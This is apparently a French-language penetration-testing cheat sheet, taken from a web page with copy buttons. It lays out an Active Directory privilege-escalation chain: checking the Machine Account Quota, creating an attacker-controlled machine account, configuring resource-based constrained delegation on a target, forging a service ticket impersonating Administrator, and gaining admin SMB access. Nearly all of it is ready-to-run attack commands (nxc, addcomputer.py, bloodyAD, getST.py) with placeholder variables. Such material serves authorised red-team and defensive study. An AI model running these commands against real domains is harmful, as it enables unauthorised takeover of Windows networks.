Copy command
nxc ldap $DC -u $USER -p $PASS -M maqDescription: Vérifier la Machine Account Quota : si > 0, tout utilisateur peut créer des comptes machine.
Exploitation
Créer un compte machine via MAQ et l'utiliser pour une chaîne RBCD vers Admin local.
nxc ldap $DC -u $USER -p $PASS -M maqDescription: Vérifier la Machine Account Quota : si > 0, tout utilisateur peut créer des comptes machine.
addcomputer.py -computer-name '$NEWPC$' -computer-pass '$PASS' -dc-ip $DC $DOMAIN/$USER:$PASSDescription: Créer un compte machine contrôlé : base pour les attaques RBCD et Kerberos.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add computer '$NEWPC$' '$PASS'Description: Alternative bloodyAD pour créer un compte machine via LDAP.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$TARGET_COMPUTER$' '$NEWPC$'Description: Configurer RBCD depuis notre machine vers la cible : prérequis pour S4U2Proxy.
getST.py -spn cifs/$TARGET.$DOMAIN -impersonate Administrator -dc-ip $DC $DOMAIN/'$NEWPC$':$PASSDescription: Générer un ST impersonant Administrator sur la cible via RBCD depuis notre machine.
nxc smb $TARGET -u Administrator -p '' --use-kcacheDescription: Utiliser le ticket ccache résultant pour accéder à la machine cible en Admin.